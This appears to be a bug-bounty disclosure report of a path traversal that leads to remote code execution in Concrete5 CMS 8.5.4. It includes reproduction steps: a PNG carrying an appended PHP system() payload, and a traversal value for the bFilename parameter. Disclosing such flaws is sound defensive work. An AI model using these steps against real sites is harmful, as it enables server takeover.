crayons
The bFilename
parameter in the scenario index.php/ccm/system/dialogs/block/design/submit
is vulnerable to remote code execution via path traversal vulnerability. Authenticated attacker with rights to edit web application pages can upload malicious PNG file containing PHP code using any attachment upload functions (for example in comment section of the blog) and then use its relative path in bFilename
parameter while editing layout design. The file, supplied in vulnerable parameter will be included in PHP, leading to injected malicious code to run.
Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24
png-transparent.png
from the attachments . It is empty PNG file with the following payload at its end:<?php system("uname -a");?>
You can get file path for example by viewing uploaded file properties:
{F1193239}
3) Navigate to page edit constructor
4) Select any element (for example Sidebar) and click “Add Layout” -> “Add Layout”
5) Click on newly added block and select “Edit layout Design” -> Save
6) Get the request from step 5 from any web proxy (for example Burp Suite) and resend it modifying bFilename
with the system relative path to the uploaded file, for example:
bFilename=../../../../application/files/9316/1312/5391/png-transparent.png
{F1193235}
This bug was found as a part of Solar Security CMS Reseach, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?
Authenticated attacker with page editing rights can run arbitrary system commands and obtain sensitive information